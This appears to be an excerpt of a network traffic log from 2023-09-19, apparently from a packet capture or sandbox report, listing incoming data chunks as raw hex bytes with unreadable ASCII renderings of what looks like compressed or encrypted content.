                                                                          2023-09-19 07:21:50 UTC32INData Raw: 78 b5 03 58 83 20 e3 3e 7a a7 6b 8d f7 99 98 b9 cd e4 92 ba c1 7a cd 62 9a 43 41 91 e4 57 7a e9 d5 33 9a 1f 5f 8d f6 82 bc 90 61 8a b0 ba 75 5b 09 45 55 65 f2 95 c1 8a e3 71 6f c0 b1 8a bb 8d 48 e0 87 3c 22 fe 79 3a 94 aa 8b f9 8a ec 0f c7 fd 87 95 1b 06 3a d5 d3 08 fd 8c 1b ae f7 5c 35 65 43 21 93 55 fc 46 46 ae ff 22 37 20 09 42 ef 10 e8 cd 9f 6d cd 28 00 57 1e cc a7 f4 5f 0c e5 de d1 02 20 a1 e9 d4 92 5f 0e b1 fd 72 25 f1 82 68 80 f1 87 14 c3 0c d7 f5 fa bb 8c 24 18 14 2b 50 da f7 a2 bf 1f 03 7f 0c 33 2d 01 ce 90 8f f8 cc 09 cd 32 8a 30 4b a0 f4 57 2e 8a d3 70 04 e3 0b 63 62 d3 ef c9 1d 08 2f 1c 4b 13 08 0c 20 ba c0 cc 6d 48 ed ed 02 f4 f8 3f f0 b6 00 20 a6 3d 17 06 20 7f a7 77 ad 9a 13 08 7a 53 e0 fd 25 93 7e 29 b2 ac 33 3e 7f c5 7b a2 5d 40 e1 74 91
                                                                          Data Ascii: xX >zkzbCAWz3_au[EUeqoH<"y::\5eC!UFF"7 Bm(W_ _r%h$+P3-20KW.pcb/K mH? = wzS%~)3>{]@t
                                                                          2023-09-19 07:21:50 UTC33INData Raw: 8f c6 ab fe 96 b3 d1 ac 4e 6c 3f b5 b5 c0 fa 15 10 42 13 3d 13 eb 3d 29 e8 6c d1 21 a4 0e c8 66 8a ff 95 55 81 f6 e6 15 fd e2 22 4f eb f4 36 c8 2f 61 2a 76 aa d6 73 bd b0 6e f9 c3 68 3b e5 42 31 13 ae 8b a0 c1 a2 62 f9 eb 14 65 f4 97 c4 68 b3 f8 92 aa 62 15 e6 29 f7 aa 28 1f 64 87 86 6c 84 5b 7d 10 9b cb 79 da 85 c5 8a 3f a4 73 1d 66 a7 f9 b9 68 fe f8 fa 01 78 c7 b1 3d a0 33 3a af 44 ab 6d aa 2e 5a fb ab 3c fd f8 ea 76 64 ac ea f7 57 2e ed 27 db 70 a2 15 df 9b 74 cf 26 30 37 bc 2b e6 f7 d5 13 e0 6e c2 b3 d5 3d 5a a3 1a 9d c5 36 3d 8d 83 8e d4 3a 24 5b c1 36 3d e3 5f c9 48 b4 6e 08 13 26 e4 65 30 90 24 c9 a9 66 66 30 da 86 b5 de 45 73 7f 96 30 7e 82 48 ce 7c f1 08 20 b5 8e 7c 01 3f 9f 8f 5b 32 5c 91 9b b2 fe d4 e7 fb a7 26 89 8e f3 c4 4a 9e bd 37 d6 22 94
                                                                          Data Ascii: Nl?B==)l!fU"O6/a*vsnh;B1behb)(dl[}y?sfhx=3:Dm.Z<vdW.'pt&07+n=Z6=:$[6=_Hn&e0$ff0Es0~H| |?[2\&J7"
                                                                          2023-09-19 07:21:50 UTC35INData Raw: d7 71 d4 b5 08 8b f7 1b 3e 8e e1 16 4f cc 57 67 39 c7 68 8c 2b b1 87 45 e7 d4 80 b8 f2 1b eb 69 39 49 a8 e6 ef 91 79 b1 7e ac 92 68 b3 cf 7b 89 4c 62 9d 41 99 05 69 7c 97 64 eb 0a f9 a6 f2 a8 a5 17 64 3c 60 9d 08 d5 79 93 ee 4b a7 33 af a6 de a1 31 8d eb 1c 8b 2c 36 b5 f8 56 93 17 4f 14 ea e3 cc 12 3f 63 ae 1b 2d e4 f6 47 a9 e8 e5 bf 18 3f 29 f9 35 ef 19 43 53 78 de f1 95 52 07 ff cc 80 ee a3 0c 49 a6 48 95 99 f4 2f 2e aa b9 76 06 75 90 1c 90 3f 3e 4c ef bd ea b5 85 64 2c fd 37 31 b1 a1 cf 6d e5 6e 34 7b c8 43 c5 77 3c b8 20 5a d0 ec 1b a4 f4 53 ac 8d e3 d8 5c d5 e8 f1 ea 92 9e cd d5 de 25 75 b0 1f 84 31 6c 85 af 5d 8e ae ca 0e 5a 46 a3 8b ea f0 3d 20 a1 a3 13 fe 7e 20 e6 fe 26 8a 61 15 b4 7b eb 93 8e 14 b2 be 71 9a dc a6 64 7d 7b 17 a2 0f 78 1e e1 69 51
                                                                          Data Ascii: q>OWg9h+Ei9Iy~h{LbAi|dd<`yK31,6VO?c-G?)5CSxRIH/.vu?>Ld,71mn4{Cw< ZS\%u1l]ZF= ~ &a{qd}{xiQ
                                                                          2023-09-19 07:21:50 UTC36INData Raw: a9 25 0e 4a 9b 5a 94 09 06 36 bd 28 0d 53 4e 72 59 36 8b 08 ba 1d c2 59 bd 4c 12 ab 3c 38 9f ab 4d 95 8b d6 e5 0d 7d a9 51 e8 8a cd c8 ab ef b1 da fc 3d 2a f6 2b 78 0e c7 68 ff 54 54 2a 70 cd 3f 97 74 b8 3e ff 33 0d 3a 35 df e0 75 e8 84 8e 0b fe c4 d4 22 aa b6 99 af 98 05 d7 a9 6a 60 ab 44 04 fd 97 c1 6b 70 e2 c6 b2 b6 94 b6 95 b9 2b 14 39 88 b4 fd 1b fe 2f 16 c6 32 60 6b 07 6c b1 45 b4 83 5f 08 86 0d 62 91 2f 7c 2b 78 c0 b1 39 8f 73 1e 66 2a 1f 55 f7 c1 46 0d 4d c2 b2 bc e1 1b d1 a3 39 a7 0e 98 fe 04 1c 71 20 2f f8 f2 f0 89 ac 16 09 90 15 0b 18 5d 46 11 56 73 cd 87 3e b1 1a aa 6a fd cf e9 6e bb 35 1c 51 82 ca db 68 d4 e8 f2 c4 bc 78 0e 60 f0 fc 9b 5f 31 fe 1f ec 6f ae 56 f1 43 9b b0 bd 0c 7f da 5a b3 27 e7 38 54 7c 40 2b 92 07 b6 71 97 36 d2 3e e1 ff 55
                                                                          Data Ascii: %JZ6(SNrY6YL<8M}Q=*+xhTT*p?t>3:5u"j`Dkp+9/2`klE_b/|+x9sf*UFM9q /]FVs>jn5Qhx`_1oVCZ'8T|@+q6>U
                                                                          2023-09-19 07:21:50 UTC37INData Raw: b3 e7 1d 63 6c 5e 2d 2b 90 11 42 7e 6c f4 f4 af 72 67 e1 f4 7f 75 c2 9c 9a 43 6d f5 f5 97 d5 d8 30 b8 3d 38 ab 8f 99 85 7a d9 50 de 57 bb 5a 58 d9 06 16 5c 1f fb f4 54 88 62 1f ad 1e 6d 72 02 c5 c2 ef 28 eb 57 0f a3 99 dd c2 e3 96 3f ef fc 33 6b f8 3f 1a 8e 43 5d 57 25 93 3a af eb f6 b5 ae 2f f2 12 92 b9 ca 21 0b 76 3e 78 22 25 80 87 b9 e7 4a b2 3a 43 af 0e 9b 4d f1 31 09 c9 f8 4f bc c5 d8 97 f7 da f3 a4 03 6d 11 d9 bd 1d 2c c2 51 65 26 9b bb 9e a7 64 8a ab cb 23 84 21 86 e0 c5 08 07 cc f3 9c ab 43 4d 7b 1f 90 0e ae 9c e2 71 82 08 c4 60 f0 03 18 f6 59 66 89 f7 35 7b 57 a6 e7 20 60 bb b2 f8 99 83 18 28 ef 98 e9 90 3b 4e 67 3d d5 7f 47 f9 bb 8b 12 f0 55 28 3f 38 a7 53 59 9e a3 f0 28 5b 87 df c9 69 48 06 2c 8e 8b 5f 9b 7f 79 ab 82 b1 e0 6d 61 4c 5a be c5 b5
                                                                          Data Ascii: cl^-+B~lrguCm0=8zPWZX\Tbmr(W?3k?C]W%:/!v>x"%J:CM1Om,Qe&d#!CM{q`Yf5{W `(;Ng=GU(?8SY([iH,_ymaLZ
                                                                          2023-09-19 07:21:50 UTC39INData Raw: 82 c2 f1 18 4a 76 32 71 a4 60 85 bd e9 33 db 8c 6f 0f 28 3c fa a5 db 30 e4 68 53 ed d0 37 cf 8b 6a f8 0c 8b cc c4 00 c8 67 e1 09 d1 5b c1 a9 ab 74 b0 50 d1 7d 9e e1 11 d4 bb 63 83 81 8e 6d 44 bb 08 c2 10 c3 5f 41 d0 65 ca b7 39 6b 27 df 9b e4 5f 2d 33 88 ef da 84 f7 87 0a f5 51 6a 3b c1 31 83 d2 85 bb 10 f1 dd 61 76 3e 6d 4e 60 99 d0 1c 11 54 cf 94 c0 04 eb c3 91 58 ea 04 ec 1c 4d 8b 86 bf a7 09 ae 78 5e 09 0e 9d ad 80 ce 4a c5 02 ef 2f 6c 36 10 3a cc 82 04 24 97 06 ce f7 ac 1e 76 a3 bd 54 b6 d8 2d 2b b8 9b dd 73 f7 89 51 29 44 8b b6 f0 46 89 01 60 80 cc db 57 57 1c e5 df 6d 5f cb be ae 98 0d f9 6d 94 31 4e 19 0e ad bb 77 30 fd ae 1d 7b 02 ac 8c 40 ff d7 af 0b 59 7b 0a 8c 17 73 62 f6 05 e3 f0 b0 a0 27 07 f4 49 c8 df 0c b8 3f e2 84 1d 6f af c5 50 c1 56 4d
                                                                          Data Ascii: Jv2q`3o(<0hS7jg[tP}cmD_Ae9k'_-3Qj;1av>mN`TXMx^J/l6:$vT-+sQ)DF`WWm_m1Nw0{@Y{sb'I?oPVM
                                                                          2023-09-19 07:21:50 UTC40INData Raw: 6e 13 61 fd 0c e5 2b 10 51 e2 05 2e 1c 36 c1 00 13 d4 49 2d 34 fd 78 f9 4e a0 9c 9d d7 6a db 86 7c 89 47 51 6e b2 f5 72 be 99 52 fd 9f b9 13 7f 50 d2 e0 73 ca 77 a6 35 82 7f 16 6a 3f 2c f0 55 79 a6 ea c1 3f 8c 6d 83 80 bb 6b 7a a2 6d ec c1 13 b2 a1 78 20 ce ca 95 14 7c b1 f6 f9 f1 88 e9 0c 02 54 d5 6d fa 53 fb b6 9f b2 41 ef 56 aa 39 12 d1 06 ef 23 7b ab c5 42 5b a8 bd ab f4 b8 f8 f0 4e dd 99 94 20 33 94 79 d4 26 a1 00 61 07 7a f7 da 56 be 01 3f fb d8 b2 d0 58 a6 81 c9 bd 91 69 4a 02 3e 02 1e f4 9a 2d 99 22 27 e1 62 4d 3e ec d9 3b 0f 37 47 d9 67 12 17 0c 0d bd 57 f5 79 01 38 02 f7 54 07 a7 30 5a 5d 6e 5f be 19 c9 a0 2f 88 21 46 bf 59 97 26 bf 2d 7e f8 33 54 63 cb 7b e6 31 a4 04 b2 22 db 57 52 08 77 11 d1 bc 9b 84 1d ab ca 8f 5b 0c 34 bc b5 a7 ab e6 5f 67
                                                                          Data Ascii: na+Q.6I-4xNj|GQnrRPsw5j?,Uy?mkzmx |TmSAV9#{B[N 3y&azV?XiJ>-"'bM>;7GgWy8T0Z]n_/!FY&-~3Tc{1"WRw[4_g
                                                                          2023-09-19 07:21:50 UTC41INData Raw: 60 62 bd c8 04 92 42 12 f6 4b ea 11 ee 39 af 83 fc 7f 46 e8 f8 dc 21 de 28 1b 26 59 11 93 2a c2 bf 46 b7 3d 1d 27 ea 7e 83 02 41 01 b0 01 5a 8e 80 35 13 41 d2 6c b1 3d 9c 88 23 3a fb 70 b6 b7 38 6b 1d ef ee 05 a4 75 71 02 2f 8f e3 22 2e 1c 0a 45 1d 78 ba 36 53 22 29 ee 90 17 e3 c9 9e 59 67 66 09 d9 10 e7 e9 e1 23 20 51 b9 1a f2 dc 00 3a 2a f7 15 a7 8b 6e eb 93 8d 44 65 ac d1 7b 02 04 0c 18 97 58 3c fb 1f 09 60 f5 1e 94 7b ea ca 5a da 59 73 03 15 8e cb e5 f6 74 72 2d 80 30 25 23 f1 78 64 d0 88 69 48 e6 13 9e 65 89 7a 50 5d 9d c7 6e e8 aa 75 ac 69 61 43 1f f2 f8 5e c0 4b 9d 45 c8 1a 8e 84 aa 98 7b 45 4c f6 31 dd 53 70 44 7b cd 30 3d c0 b0 8a 76 32 67 f7 cf 74 0e 2c 7a 75 63 72 19 fb 33 6e 3d 04 e6 38 a2 33 bd 3f d2 62 1b be f2 22 d0 b6 7a 4d 20 2e 1e cd e9
                                                                          Data Ascii: `bBK9F!(&Y*F='~AZ5Al=#:p8kuq/".Ex6S")Ygf# Q:*nDe{X<`{ZYstr-0%#xdiHezP]nuiaC^KE{EL1SpD{0=v2gt,zucr3n=83?b"zM .
                                                                          2023-09-19 07:21:50 UTC43INData Raw: bf ee 0b ab 8b fb 62 c5 82 55 d9 bd 52 45 13 f9 0b 38 4e 94 bc e5 5f 07 83 dd 84 eb 90 10 11 d9 55 94 96 b5 77 06 a4 63 ac f8 07 ea 54 58 4b 1e 92 85 68 a3 d3 58 cc 77 da e0 f6 8d d6 02 a6 e7 a8 c0 95 1a e6 ea 60 be 67 69 48 fd fc 76 f8 66 36 b2 15 f2 2c aa 6e 77 a6 14 56 dd 78 b8 ea cd 77 c6 0f c3 96 c1 65 ee 03 26 0e 8a 85 53 9c b2 89 c6 0e 66 f7 b5 28 4e 5c 15 79 1a a0 8c 8f 14 6f b1 b6 8c 02 42 b8 9a 5c db c7 ee 92 2f 78 8f 9e cc 23 3d bc 24 71 a2 62 d1 60 1d 1c e2 dd a1 67 56 f1 76 8f 9f a7 8e 19 25 07 32 89 f4 32 c6 4b 9a d2 01 c1 74 82 48 24 dd 8d 75 f5 5a d1 9a 88 a9 60 0d 76 02 4e 5d 17 16 a7 7e 42 7e c2 71 8b 56 7d 8a ba 85 23 2c f9 82 4e b8 5c 7d 3c e6 0a 9a a8 55 bd 1f 83 00 bf c8 b3 95 60 23 16 d7 95 39 1f 5d 16 dd 70 92 ca 89 25 c4 46 d1 f0
                                                                          Data Ascii: bURE8N_UwcTXKhXw`giHvf6,nwVxwe&Sf(N\yoB\/x#=$qb`gVv%22KtH$uZ`vN]~B~qV}#,N\}<U`#9]p%F
                                                                          2023-09-19 07:21:50 UTC44INData Raw: a9 d7 4c 9b c1 be e5 de 87 a8 d9 35 e2 54 9c 91 13 13 22 71 33 03 31 59 17 69 68 67 5b 83 e7 05 a0 13 85 4c f6 c8 8d ac eb 94 56 da 39 9e 60 eb 5a b4 ce 9c 93 47 ac 3b cd de b6 cf 97 06 b0 37 a3 50 4e b1 61 5e 2a c7 1d 2d 45 71 cf 89 b5 06 40 76 c8 4f 60 fd 71 37 cc 27 47 b4 c6 2c c4 1e 50 cb dd 74 d7 6b 4e 69 98 66 b7 a1 ba 67 17 cf cf 22 95 c4 c8 94 dc 94 1f 63 ac 01 1d bc d1 d1 b9 eb 1f cc b1 86 e6 a3 95 5e 06 9b f9 cf e6 81 3e c2 1a 83 20 3d b6 8c bf 0f 6d dd 8a 61 38 18 df 53 32 72 bf 74 26 b5 3c 0c 37 a0 e3 74 3d b9 bb 7b fa ce 90 e6 10 d7 77 24 d0 ee 0f f5 1e ef ef 94 35 f9 48 39 79 fc db 71 60 eb d4 48 b8 03 88 4b 53 71 6d 16 81 10 e4 10 3b 9f 80 26 43 a1 b9 c3 04 a5 7b c6 8d e0 1a a0 3b 55 b1 c1 5c 0f c3 74 2d 7a cc 0b 14 f3 2e 31 88 32 de ca 39
                                                                          Data Ascii: L5T"q31Yihg[LV9`ZG;7PNa^*-Eq@vO`q7'G,PtkNifg"c^> =ma8S2rt&<7t={w$5H9yq`HKSqm;&C{;U\t-z.129
                                                                          2023-09-19 07:21:50 UTC45INData Raw: d5 7f 4e a4 ce 9e 0b 5d c4 08 0c 2f 5b c4 63 d3 c7 c1 0c 00 6d e7 99 1a 00 b5 74 3b 2b 9e 2b 43 a5 09 3d a0 4e e2 0c 32 b9 24 18 2c 55 e5 d1 04 82 66 91 72 5f 69 b9 ef a1 32 e3 9b 51 65 b7 58 52 c3 63 fe 24 48 b1 b6 a8 c2 a8 5a d8 cc 8e 03 8a c5 a6 1f 8d c3 c0 0f 12 25 80 77 37 1e 92 46 f8 94 91 62 cc 2a 9a 7f c8 da 02 9d 7c 10 57 ab b6 af a3 65 3d ac eb dc 62 47 e9 9d 60 d7 d7 0a 3b 14 20 24 ae d9 b1 36 75 bb 4c c9 18 47 58 d3 d5 b5 77 bf fd 19 d7 2e 69 36 2d 61 38 b5 2c 72 11 1f 36 3f 6c 20 2b cb 49 1c 67 b1 b6 c5 97 a4 cb 58 0a 8e d6 9b 6c 4f d4 2b c0 48 70 2b 68 9f d3 a1 98 64 1c 22 4d 6b c1 f0 1f ed bb ae 79 7e 0c b6 7f 51 4c 8a 78 f1 98 ca 1b a9 e5 31 b2 2c 80 12 00 97 30 6f c4 34 ef 06 b5 c7 e4 dd 4f d7 05 75 7f 32 ee 2b cd 6e 80 3f 7c c6 25 64 e9
                                                                          Data Ascii: N]/[cmt;++C=N2$,Ufr_i2QeXRc$HZ%w7Fb*|We=bG`; $6uLGXw.i6-a8,r6?l +IgXlO+Hp+hd"Mky~QLx1,0o4Ou2+n?|%d
                                                                          2023-09-19 07:21:50 UTC47INData Raw: bd ca da 0b 58 90 cf 74 e5 89 f8 8c c1 bb 46 df 56 69 18 70 1b 38 42 2b ee 51 52 2d 9b bf 6c 69 a4 88 83 19 64 88 50 23 6d f0 55 85 86 2a 85 32 49 bf 1d 14 d3 c7 ee ae 59 dd 11 58 10 28 71 84 eb b0 5a 97 01 52 c9 ef 2b 58 61 4c e0 bb af 6c 64 5d 07 26 64 8e aa 7c 7b ab c2 f3 f2 de d2 24 c8 d3 8a 1f 43 59 2b 5d 17 1d 7f 47 2f 01 f6 0c 57 03 a4 c5 24 9d 4f 9f 48 4c 8e bb ca 80 4e d3 df 6e b4 8f ff 4a 49 d0 11 4e 61 73 0b 0c 0e db b7 29 ee 1f e3 79 a8 24 25 8d 84 7a 25 35 bd be c5 c8 83 31 ec 84 bc 03 77 16 9d 7c c8 71 ed 92 84 9e 65 06 37 aa 44 19 b4 16 a1 2a 32 da 9d ee ff 33 e3 f8 1f d9 42 ed 11 23 a7 05 b3 47 e4 a4 97 99 4c f0 7f a4 79 82 b3 0e 0d 0a 66 47 09 fb 5a a2 85 da 16 38 c2 eb 07 12 6a 60 21 82 e4 c0 7f 3b 45 05 2b 8d ef e9 c7 09 cf aa 63 38 b0
                                                                          Data Ascii: XtFVip8B+QR-lidP#mU*2IYX(qZR+XaLld]&d|{$CY+]G/W$OHLNnJINas)y$%z%51w|qe7D*23B#GLyfGZ8j`!;E+c8
                                                                          2023-09-19 07:21:50 UTC48INData Raw: 9f c5 0b 4c 59 5f b7 d1 c2 f2 e8 fb 01 c4 37 3e 3d 37 8f 3c b9 07 2a 72 dd b1 04 d3 0b d8 63 42 14 a2 79 ee 67 bf 35 2d 6f c1 d2 fd f6 a5 e2 ea a2 05 8a ac bc 1d 89 d8 2d 3f 5c 53 71 8b db 31 a5 dd d3 5b 0d 9f 77 c3 71 82 cc 68 47 fc c8 d0 86 20 b5 98 0d 7c c3 1c 04 4a ed 1a ee 1d 91 21 9f 70 e2 ac 28 20 05 5d 79 bc 48 74 77 99 91 5c ee 4a 6f e3 45 28 eb 4b f9 de 09 a8 8b 72 f5 c2 01 32 68 8a 6c 14 62 9f cb 3c 17 9a 07 db 38 f9 2b ab 4c e0 67 e7 70 d2 41 97 10 49 3f 7e 69 52 ec 87 11 cb 99 a5 9b 92 d0 a2 f0 3e 55 52 a5 97 9c 61 ec 37 d5 01 e8 fe c7 cc fa 87 b4 71 8e d8 13 db 88 de fc 42 bb e2 08 5c ef fa f5 62 0b ca 18 6b 02 c7 9a 7a 80 bb 8a 31 56 88 0e 44 6e cb 31 3e a0 cf ba dd b5 51 74 13 24 d7 8d d9 69 fb 74 d4 22 02 28 2d 02 51 38 77 33 e5 91 3a 56
                                                                          Data Ascii: LY_7>=7<*rcByg5-o-?\Sq1[wqhG |J!p( ]yHtw\JoE(Kr2hlb<8+LgpAI?~iR>URa7qB\bkz1VDn1>Qt$it"(-Q8w3:V
                                                                          2023-09-19 07:21:50 UTC49INData Raw: 2d c4 af cd 23 eb e7 e8 fc da 67 ad e1 e1 1a f6 c0 43 4e af bc 15 ad da c4 d9 a0 19 a0 29 50 11 d3 81 37 62 e6 90 0a 0c 43 46 85 33 40 cd 7d 92 8a ef 0b 08 09 06 ce cd d0 fc fd 2d 9f 95 f7 a6 95 0a c3 e5 bf 1f 18 c4 fa 3c 6c 44 26 bf 33 cd 4b dd 26 e5 af 5d 4d 47 30 f5 e1 f9 82 f2 ff 6f 51 01 cf b6 6c 48 9c 08 0f 10 fc 42 cf 20 b7 a7 cf 28 85 88 08 b0 12 98 1c 87 8f f5 b4 a9 93 46 3e b8 33 93 c6 8f dd c4 81 9e 5e 8c b1 46 cb 77 89 aa e8 ef 81 83 78 d9 fe 16 ef 43 16 f2 65 b6 61 c8 e1 b0 8e 43 66 a5 b0 b3 63 51 3c 28 21 c0 96 13 67 0a e7 6e 6e ec 10 32 aa 59 87 38 fd bf d8 4f 73 7b 50 fd 6b 44 cf 32 63 21 9c 5c 38 bd 9a be 97 97 f4 02 2e f3 ca a2 6b a8 ff 55 46 dc 7e ae f8 43 0d 24 c4 50 45 16 be d5 7b c9 3e b9 b8 86 fb 11 3f 7c b3 15 8a 5d a8 ac 72 a6 4a
                                                                          Data Ascii: -#gCN)P7bCF3@}-<lD&3K&]MG0oQlHB (F>3^FwxCeaCfcQ<(!gnn2Y8Os{PkD2c!\8.kUF~C$PE{>?|]rJ
                                                                          2023-09-19 07:21:50 UTC51INData Raw: 3c 59 48 ec dd b4 95 45 f5 19 5c ed 45 04 57 39 3d fd 7d bc 41 b1 3b b0 a7 75 ff 60 a5 c9 4f 85 81 72 ac 5c b0 5d 9b 2f 26 fb 5f fc 98 57 e5 30 8f dc 41 08 65 f0 6d a2 b3 ed 1c 94 ea 28 d0 14 b5 f5 14 cc be 64 8d 2c 1d 49 0d ac 62 71 66 0c 92 82 2c 52 dc bb f9 c6 8b 17 ad f9 32 03 f0 31 3f 3e 0f 3f 34 db c0 b9 90 fd 6d 20 23 cc f1 84 47 82 66 c5 68 41 9c 80 9e 5e 1b 22 65 72 08 5e 05 66 07 54 9e 2d ef 3b a1 56 5f 5a eb 57 01 66 e3 5e a8 3c 17 eb b4 a1 1c ef 6a 19 82 2b 42 aa ac 3c 78 a0 a4 81 52 eb cd a3 cc d7 5b b3 76 c3 e6 15 10 ed 1d 04 37 c9 4a 3a da 11 7b a7 93 98 2e 81 86 d8 08 43 7e 26 e0 e6 00 01 5b 1a 3c 03 cb 9c e7 3a 9e 86 57 f2 6a 83 bc 87 cb 6e 06 dd cc d9 cd 66 aa f9 18 d5 ec 97 d2 1d 41 2a 5a cf 02 8d fb c4 4c 4e 3f b0 b4 67 f9 5f 53 27 5b
                                                                          Data Ascii: <YHE\EW9=}A;u`Or\]/&_W0Aem(d,Ibqf,R21?>?4m #GfhA^"er^fT-;V_ZWf^<j+B<xR[v7J:{.C~&[<:WjnfA*ZLN?g_S'[
                                                                          2023-09-19 07:21:50 UTC52INData Raw: 69 ad 90 24 aa 3f 06 92 3e ca d7 ae 7e 82 45 eb 80 c5 69 ee 3a 84 a0 bf 3e b7 ea b1 ce d0 30 3b 23 d1 1a d8 8e 10 0b 88 a3 e2 ed 89 a3 ff ab 05 2a 8c 79 22 fb 6a a1 a4 cf c9 7b 99 15 e9 11 5e d9 7a 07 4f f4 e5 bd 7b 75 e7 0c 6b 95 43 01 b7 e0 ef 63 fd 0b 51 e6 ab 70 b9 ae f6 e9 d7 b1 d6 15 e1 73 82 9a c9 a7 f3 39 de c6 1d e9 b4 04 90 37 88 7d 68 93 79 35 71 02 8c f5 d0 a2 69 6a 48 86 d7 9a f8 0a 36 61 e7 0f 27 0c 18 a1 c5 ed 9e 94 97 59 37 0f 09 e1 fb 14 f6 68 46 b1 b9 fc 10 4e 97 4b 8f 05 90 5c e2 53 0d 5e 08 59 75 66 43 32 1a ba 57 53 93 70 01 cb b7 48 c9 aa 97 57 cc 03 e7 0d cb 72 f2 ac d6 26 65 39 f2 13 18 b3 5b d3 d3 6b 71 ef 3a 5c 18 f6 35 56 5f a1 73 09 c8 19 b3 65 01 7e a4 f5 34 08 c2 0b d9 1f 37 7a 8c 25 41 9e 95 c8 67 e6 bf bb 85 02 87 e9 8a d0
                                                                          Data Ascii: i$?>~Ei:>0;#*y"j{^zO{ukCcQps97}hy5qijH6a'Y7hFNK\S^YufC2WSpHWr&e9[kq:\5V_se~47z%Ag
                                                                          2023-09-19 07:21:50 UTC53INData Raw: f8 40 ee 24 fc d2 b8 ec fd 56 cb a8 fd a9 26 0e 04 de d9 9b 2c 8d e5 d1 de 97 54 2f 3a bf e8 5c a5 0c 3b d5 16 10 2a 60 e0 fc 8d 34 66 4c 69 d3 58 d9 41 c8 f7 a2 15 ca 46 e4 69 1e 3a 91 55 cb 33 66 c6 a9 07 b8 39 f9 c2 be 2b 06 5c e6 c9 78 8e cb d6 ee c6 d0 84 a6 f0 34 f8 bf 5a 70 e9 19 9b 48 eb cf b7 e7 2b 4a 9d 06 5c cb df b3 59 e4 52 7f d2 1b 0b 59 71 05 06 b1 94 48 c3 1c e6 b8 db 40 da e2 22 6e 93 0f 17 c5 6b d2 10 1c dc 9b be f1 db cf 78 a8 91 d3 4d 87 99 9d 15 d2 cd 5a 7c 2e 14 61 14 b2 d8 6e 68 a9 71 e3 32 20 41 95 ed 69 47 c9 25 e8 c4 60 dc 66 16 c2 1b 69 7e ba 06 69 5a a5 42 98 b0 4b 13 c7 ce a2 a8 ac 81 b8 ff 16 f1 21 e0 72 2e dd 44 72 bb 37 14 76 3e 98 3f 8d b5 6d a4 1f 62 72 5e 1c ea a7 d3 d9 18 43 cc 21 26 d5 df 70 09 8b a5 46 c1 e2 9a 84 34
                                                                          Data Ascii: @$V&,T/:\;*`4fLiXAFi:U3f9+\x4ZpH+J\YRYqH@"nkxMZ|.anhq2 AiG%`fi~iZBK!r.Dr7v>?mbr^C!&pF4
                                                                          2023-09-19 07:21:50 UTC57INData Raw: 0f a6 c1 7f f4 c8 09 94 c8 72 a3 61 02 95 dd 94 a0 cd f6 87 d1 39 39 2e 44 65 1d ad dd 5b 18 fd 1f f4 4e c6 8f bb 9b a2 3b de 41 7d 14 77 59 ac 72 e5 f0 e3 8b 50 dd b3 60 18 6c 28 c8 65 f1 da 35 42 ba 55 79 f9 bb df 9c 6a 03 7c 7a c6 12 ef cf b8 38 cb 34 74 c2 5d a6 ab bf 68 1f 91 a0 3c 7f 6a 86 c3 1e 07 35 55 62 df b6 ea ad d3 d7 15 e4 a5 55 77 ed 58 66 17 4d 7d 80 93 d6 99 0c 6e 42 5d d0 19 46 03 24 da 11 85 de df 81 24 1d 05 c8 2a 32 f3 f0 bb 6f f6 96 3f 99 56 bc 41 4e 72 27 9a db f4 b6 3e 2f eb b2 12 dc 86 f4 d5 a7 ea ea a2 33 bd 66 66 37 c8 2b cb 94 de f7 e0 3f b1 c7 44 6a 3f 5c ff 23 dd 2a 27 01 c8 19 2f 22 02 57 d2 41 68 c6 e5 17 6f 91 31 8d 74 81 96 a3 fa 54 f0 f1 e6 6e 53 2e c6 7e 57 80 2c d6 4d 87 8a a5 64 56 81 06 ea 64 c1 bc d1 84 e4 56 f0 07
                                                                          Data Ascii: ra99.De[N;A}wYrP`l(e5BUyj|z84t]h<j5UbUwXfM}nB]F$$*2o?VANr'>/3ff7+?Dj?\#*'/"WAho1tTnS.~W,MdVdV
                                                                          2023-09-19 07:21:50 UTC62INData Raw: 9b 99 73 72 e3 65 5c 3c a1 09 67 33 03 86 3d 12 2c 0a e2 66 4e d6 b3 09 7d 59 d3 14 bd 8d a6 b8 86 bf 2c 22 ff 68 c1 ba 60 dd ca c7 2d 42 f3 d8 b5 0e 9b 3f d2 37 66 86 66 00 13 d6 7e 82 e9 88 a6 60 42 51 ff 27 ec f8 94 0c 4b 38 3b 9e 30 a0 1c 94 69 59 3c f8 83 79 11 36 02 ed c7 54 f8 e0 c1 a0 76 f1 7b 58 47 fb 81 ad e8 55 18 b3 94 14 fe 8f ec 43 03 02 73 13 cb cd f3 5c da bb a6 79 45 fb c9 91 cd 75 82 10 04 86 41 5b f1 e6 7a 2c bb 3f 40 5f f8 c6 a6 bc e3 c3 af 7d bf 52 06 2a 4f 76 bf de e2 2c c3 f9 d5 b8 dc 9d 65 5e 00 e0 72 5b 63 a8 93 07 91 67 0b a4 ad c6 00 f9 2b 66 84 99 7e 13 bb 77 05 e3 10 5d c4 b4 82 9b d9 6d c4 51 2a c9 bb 44 11 79 ea 91 55 37 52 32 02 6b 1e c1 71 a1 74 1e 62 d0 0c 50 c4 66 9d 32 b1 a6 98 07 6d 06 81 ef 02 d0 58 57 9a df be 8f d0
                                                                          Data Ascii: sre\<g3=,fN}Y,"h`-B?7ff~`BQ'K8;0iY<y6Tv{XGUCs\yEuA[z,?@_}R*Ov,e^r[cg+f~w]mQ*DyU7R2kqtbPf2mXW
                                                                          2023-09-19 07:21:50 UTC65INData Raw: 55 23 e8 ea b8 93 8e bb 67 89 43 a2 41 7b a5 32 06 fe 9f df e5 da 40 89 ab fa 86 4e 21 27 37 3e c2 9a 88 fb 3c c5 fb aa 68 0f 01 a9 5d 93 90 e3 29 44 87 f8 3c 10 e8 61 45 65 d0 0c cd f7 d5 b2 69 f7 05 4f 7b e0 3c 63 c0 cc eb bc 38 b2 53 36 0b 18 7d d8 85 2b 11 dc 07 44 5e 3c f6 50 bd 9e d8 e5 e8 f0 86 0e 25 35 5e 25 9c dc ae 4a 72 c5 cf 74 a5 d7 bd 09 34 d5 73 be 98 a7 34 c6 11 8c aa 46 7b 85 06 59 a8 f1 b4 a4 a3 86 a2 1f 79 1f e2 91 3f 01 85 4c 38 fe 97 cf 67 6f 41 bc e2 82 79 44 c1 6f f6 10 86 7e fb 54 3c 2e c0 15 d7 17 8e 6e a5 5b 94 f3 f9 16 a0 a6 e2 bc 69 0d 3f 4f ac 6b f8 e5 4b b0 d2 89 47 35 57 32 6b 8e 59 5b 0d 49 46 ee 41 9b 68 2f 5a ea c6 16 03 4c 86 92 0a 36 2a 58 3c c6 c7 36 a5 ef 